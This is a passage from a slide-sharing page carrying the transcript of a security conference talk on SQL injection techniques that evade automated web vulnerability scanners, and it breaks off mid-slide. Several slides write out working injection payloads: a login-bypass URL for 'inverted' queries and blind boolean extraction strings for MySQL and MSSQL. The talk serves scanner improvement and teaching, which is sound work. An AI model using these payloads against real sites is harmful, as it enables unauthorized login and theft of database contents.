Share Favorite Favorited X Download More... Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel Edit your favorites Cancel Send to your Group / Event Select Group / Event Add your message Cancel Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com Without related presentations 0 commentsPost a comment Post a comment .. Embed Video Subscribe to follow-up comments Unsubscribe from followup comments . Edit your comment Cancel .Notes on slide 1 no notes for slide #1 no notes for slide #1 ..Favorites, Groups & Events more How "·$% developers defeat the web vulnerability scanners - Presentation Transcript 1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 2.Agenda 1.- Introduction 2.- Inverted Queries 3.- Arithmetic Blind SQL Injection 4.- Time-Based Blind SQL Injection using Heavey Queries 5.- Conclusions 3.1.-Introduction 4.SQL Injection is still here among us 5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 6.Need to Improve Automatic Scanning Not always a manual scanning is possible Time Confidentiality Money, money, money… Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 7.2.-Inverted Queries 8. 9.Homers, how are they? Lazy Bad trainined Poor Experience in security stuff Don´t like working Don´t like computing Don´t like coding Don´t like you! 10.Flanders are Left-handed 11.Right SELECT UID FROM USERS WHERE NAME=‘V_NAME’ AND PASSWORD=‘V_PASSW’; 12.Wrong? SELECT UID FROM USERS WHERE ‘V_NAME’=NAME AND ‘ V_PASSW’=PASSWORD 13.Login Inverted Query Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1 Select uid From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password FAIL 14.Login Inverted SQL Injection an example Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica Select uid From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password Success 15.Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection 16.Blind SQL Injection Attacks Attacker injects: “ True where clauses” “ False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database. 17.Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “ Different behavior” By example: Response Time 18.Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “ True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Sub